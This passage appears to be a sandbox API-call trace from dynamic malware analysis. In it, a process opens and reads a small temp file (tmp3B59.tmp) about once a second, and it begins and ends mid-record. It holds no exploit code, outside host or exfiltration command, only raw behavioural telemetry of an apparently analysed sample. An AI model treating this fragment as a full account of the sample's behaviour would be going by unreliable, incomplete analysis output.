CloseHandle (hObject=0x300) returned 1 [0091.434] GetLastError () returned 0x0 [0094.343] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0094.343] GetLastError () returned 0x0 [0094.343] SetErrorMode (uMode=0x1) returned 0x0 [0094.343] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0094.343] GetLastError () returned 0x0 [0094.343] GetFileType (hFile=0x300) returned 0x1 [0094.343] SetErrorMode (uMode=0x0) returned 0x1 [0094.343] GetFileType (hFile=0x300) returned 0x1 [0094.343] ReadFile (in: hFile=0x300, lpBuffer=0x335f150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x335f150*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0094.344] GetLastError () returned 0x0 [0094.344] ReadFile (in: hFile=0x300, lpBuffer=0x335f150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x335f150*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0094.344] GetLastError () returned 0x0 [0094.344] CloseHandle (hObject=0x300) returned 1 [0094.344] GetLastError () returned 0x0 [0095.345] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0095.345] GetLastError () returned 0x0 [0095.345] SetErrorMode (uMode=0x1) returned 0x0 [0095.345] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0095.346] GetLastError () returned 0x0 [0095.346] GetFileType (hFile=0x300) returned 0x1 [0095.346] SetErrorMode (uMode=0x0) returned 0x1 [0095.346] GetFileType (hFile=0x300) returned 0x1 [0095.346] ReadFile (in: hFile=0x300, lpBuffer=0x33614b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33614b0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0095.347] GetLastError () returned 0x0 [0095.347] ReadFile (in: hFile=0x300, lpBuffer=0x33614b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33614b0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0095.347] GetLastError () returned 0x0 [0095.347] CloseHandle (hObject=0x300) returned 1 [0095.348] GetLastError () returned 0x0 [0096.358] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0096.358] GetLastError () returned 0x0 [0096.358] SetErrorMode (uMode=0x1) returned 0x0 [0096.358] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0096.358] GetLastError () returned 0x0 [0096.358] GetFileType (hFile=0x300) returned 0x1 [0096.358] SetErrorMode (uMode=0x0) returned 0x1 [0096.358] GetFileType (hFile=0x300) returned 0x1 [0096.358] ReadFile (in: hFile=0x300, lpBuffer=0x3363810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3363810*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0096.359] GetLastError () returned 0x0 [0096.359] ReadFile (in: hFile=0x300, lpBuffer=0x3363810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3363810*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0096.359] GetLastError () returned 0x0 [0096.359] CloseHandle (hObject=0x300) returned 1 [0096.359] GetLastError () returned 0x0 [0097.379] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0097.379] GetLastError () returned 0x0 [0097.379] SetErrorMode (uMode=0x1) returned 0x0 [0097.379] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0097.379] GetLastError () returned 0x0 [0097.379] GetFileType (hFile=0x300) returned 0x1 [0097.379] SetErrorMode (uMode=0x0) returned 0x1 [0097.379] GetFileType (hFile=0x300) returned 0x1 [0097.380] ReadFile (in: hFile=0x300, lpBuffer=0x3365b70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3365b70*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0097.380] GetLastError () returned 0x0 [0097.380] ReadFile (in: hFile=0x300, lpBuffer=0x3365b70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3365b70*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0097.380] GetLastError () returned 0x0 [0097.380] CloseHandle (hObject=0x300) returned 1 [0097.380] GetLastError () returned 0x0 [0098.389] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0098.389] GetLastError () returned 0x0 [0098.389] SetErrorMode (uMode=0x1) returned 0x0 [0098.389] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0098.389] GetLastError () returned 0x0 [0098.389] GetFileType (hFile=0x300) returned 0x1 [0098.390] SetErrorMode (uMode=0x0) returned 0x1 [0098.390] GetFileType (hFile=0x300) returned 0x1 [0098.390] ReadFile (in: hFile=0x300, lpBuffer=0x3367ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3367ed0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0098.390] GetLastError () returned 0x0 [0098.390] ReadFile (in: hFile=0x300, lpBuffer=0x3367ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3367ed0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0098.390] GetLastError () returned 0x0 [0098.390] CloseHandle (hObject=0x300) returned 1 [0098.390] GetLastError () returned 0x0 [0100.315] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0100.315] GetLastError () returned 0x0 [0100.315] SetErrorMode (uMode=0x1) returned 0x0 [0100.315] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0100.315] GetLastError () returned 0x0 [0100.315] GetFileType (hFile=0x300) returned 0x1 [0100.315] SetErrorMode (uMode=0x0) returned 0x1 [0100.315] GetFileType (hFile=0x300) returned 0x1 [0100.315] ReadFile (in: hFile=0x300, lpBuffer=0x336a230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x336a230*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0100.316] GetLastError () returned 0x0 [0100.316] ReadFile (in: hFile=0x300, lpBuffer=0x336a230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x336a230*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0100.316] GetLastError () returned 0x0 [0100.316] CloseHandle (hObject=0x300) returned 1 [0100.316] GetLastError () returned 0x0 [0101.329] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0101.329] GetLastError () returned 0x0 [0101.329] SetErrorMode (uMode=0x1) returned 0x0 [0101.329] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0101.329] GetLastError () returned 0x0 [0101.329] GetFileType (hFile=0x300) returned 0x1 [0101.329] SetErrorMode (uMode=0x0) returned 0x1 [0101.329] GetFileType (hFile=0x300) returned 0x1 [0101.329] ReadFile (in: hFile=0x300, lpBuffer=0x336c590, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x336c590*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0101.330] GetLastError () returned 0x0 [0101.330] ReadFile (in: hFile=0x300, lpBuffer=0x336c590, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x336c590*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0101.330] GetLastError () returned 0x0 [0101.330] CloseHandle (hObject=0x300) returned 1 [0101.330] GetLastError () returned 0x0 [0103.794] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0103.794] GetLastError () returned 0x0 [0103.794] SetErrorMode (uMode=0x1) returned 0x0 [0103.794] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0103.795] GetLastError () returned 0x0 [0103.795] GetFileType (hFile=0x300) returned 0x1 [0103.795] SetErrorMode (uMode=0x0) returned 0x1 [0103.795] GetFileType (hFile=0x300) returned 0x1 [0103.795] ReadFile (in: hFile=0x300, lpBuffer=0x336e8f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x336e8f0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0103.795] GetLastError () returned 0x0 [0103.795] ReadFile (in: hFile=0x300, lpBuffer=0x336e8f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x336e8f0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0103.795] GetLastError () returned 0x0 [0103.795] CloseHandle (hObject=0x300) returned 1 [0103.795] GetLastError () returned 0x0 [0104.798] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0104.798] GetLastError () returned 0x0 [0104.798] SetErrorMode (uMode=0x1) returned 0x0 [0104.798] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0104.798] GetLastError () returned 0x0 [0104.798] GetFileType (hFile=0x300) returned 0x1 [0104.798] SetErrorMode (uMode=0x0) returned 0x1 [0104.798] GetFileType (hFile=0x300) returned 0x1 [0104.799] ReadFile (in: hFile=0x300, lpBuffer=0x3370c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3370c50*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0104.799] GetLastError () returned 0x0 [0104.799] ReadFile (in: hFile=0x300, lpBuffer=0x3370c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3370c50*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0104.799] GetLastError () returned 0x0 [0104.799] CloseHandle (hObject=0x300) returned 1 [0104.800] GetLastError () returned 0x0 [0106.686] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0106.686] GetLastError () returned 0x0 [0106.686] SetErrorMode (uMode=0x1) returned 0x0 [0106.686] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0106.687] GetLastError () returned 0x0 [0106.687] GetFileType (hFile=0x300) returned 0x1 [0106.687] SetErrorMode (uMode=0x0) returned 0x1 [0106.687] GetFileType (hFile=0x300) returned 0x1 [0106.687] ReadFile (in: hFile=0x300, lpBuffer=0x3372fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3372fb0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0106.687] GetLastError () returned 0x0 [0106.687] ReadFile (in: hFile=0x300, lpBuffer=0x3372fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3372fb0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0106.688] GetLastError () returned 0x0 [0106.688] CloseHandle (hObject=0x300) returned 1 [0106.688] GetLastError () returned 0x0 [0107.692] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0107.692] GetLastError () returned 0x0 [0107.692] SetErrorMode (uMode=0x1) returned 0x0 [0107.693] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0107.693] GetLastError () returned 0x0 [0107.693] GetFileType (hFile=0x300) returned 0x1 [0107.693] SetErrorMode (uMode=0x0) returned 0x1 [0107.693] GetFileType (hFile=0x300) returned 0x1 [0107.693] ReadFile (in: hFile=0x300, lpBuffer=0x3375310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3375310*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0107.693] GetLastError () returned 0x0 [0107.693] ReadFile (in: hFile=0x300, lpBuffer=0x3375310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3375310*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0107.693] GetLastError () returned 0x0 [0107.694] CloseHandle (hObject=0x300) returned 1 [0107.694] GetLastError () returned 0x0 [0108.708] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0108.708] GetLastError () returned 0x0 [0108.708] SetErrorMode (uMode=0x1) returned 0x0 [0108.708] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0108.708] GetLastError () returned 0x0 [0108.708] GetFileType (hFile=0x300) returned 0x1 [0108.708] SetErrorMode (uMode=0x0) returned 0x1 [0108.708] GetFileType (hFile=0x300) returned 0x1 [0108.708] ReadFile (in: hFile=0x300, lpBuffer=0x3377670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3377670*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0108.709] GetLastError () returned 0x0 [0108.709] ReadFile (in: hFile=0x300, lpBuffer=0x3377670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3377670*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0108.709] GetLastError () returned 0x0 [0108.709] CloseHandle (hObject=0x300) returned 1 [0108.709] GetLastError () returned 0x0 [0109.723] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0109.723] GetLastError () returned 0x0 [0109.723] SetErrorMode (uMode=0x1) returned 0x0 [0109.723] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0109.724] GetLastError () returned 0x0 [0109.724] GetFileType (hFile=0x300) returned 0x1 [0109.724] SetErrorMode (uMode=0x0) returned 0x1 [0109.724] GetFileType (hFile=0x300) returned 0x1 [0109.724] ReadFile (in: hFile=0x300, lpBuffer=0x33799d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33799d0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0109.724] GetLastError () returned 0x0 [0109.724] ReadFile (in: hFile=0x300, lpBuffer=0x33799d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33799d0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0109.725] GetLastError () returned 0x0 [0109.725] CloseHandle (hObject=0x300) returned 1 [0109.725] GetLastError () returned 0x0 [0110.740] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0110.740] GetLastError () returned 0x0 [0110.740] SetErrorMode (uMode=0x1) returned 0x0 [0110.740] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0110.740] GetLastError () returned 0x0 [0110.740] GetFileType (hFile=0x300) returned 0x1 [0110.740] SetErrorMode (uMode=0x0) returned 0x1 [0110.740] GetFileType (hFile=0x300) returned 0x1 [0110.741] ReadFile (in: hFile=0x300, lpBuffer=0x337bd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x337bd30*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0110.741] GetLastError () returned 0x0 [0110.741] ReadFile (in: hFile=0x300, lpBuffer=0x337bd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x337bd30*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0110.741] GetLastError () returned 0x0 [0110.741] CloseHandle (hObject=0x300) returned 1 [0110.741] GetLastError () returned 0x0 [0111.755] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0111.755] GetLastError () returned 0x0 [0111.755] SetErrorMode (uMode=0x1) returned 0x0 [0111.755] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0111.756] GetLastError () returned 0x0 [0111.756] GetFileType (hFile=0x300) returned 0x1 [0111.756] SetErrorMode (uMode=0x0) returned 0x1 [0111.756] GetFileType (hFile=0x300) returned 0x1 [0111.756] ReadFile (in: hFile=0x300, lpBuffer=0x337e090, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x337e090*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0111.756] GetLastError () returned 0x0 [0111.756] ReadFile (in: hFile=0x300, lpBuffer=0x337e090, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x337e090*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0111.756] GetLastError () returned 0x0 [0111.756] CloseHandle (hObject=0x300) returned 1 [0111.757] GetLastError () returned 0x0 [0112.771] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0112.771] GetLastError () returned 0x0 [0112.771] SetErrorMode (uMode=0x1) returned 0x0 [0112.771] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0112.771] GetLastError () returned 0x0 [0112.771] GetFileType (hFile=0x300) returned 0x1 [0112.771] SetErrorMode (uMode=0x0) returned 0x1 [0112.772] GetFileType (hFile=0x300) returned 0x1 [0112.772] ReadFile (in: hFile=0x300, lpBuffer=0x33803f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33803f0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0112.772] GetLastError () returned 0x0 [0112.772] ReadFile (in: hFile=0x300, lpBuffer=0x33803f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33803f0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0112.772] GetLastError () returned 0x0 [0112.772] CloseHandle (hObject=0x300) returned 1 [0112.772] GetLastError () returned 0x0 [0113.786] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: 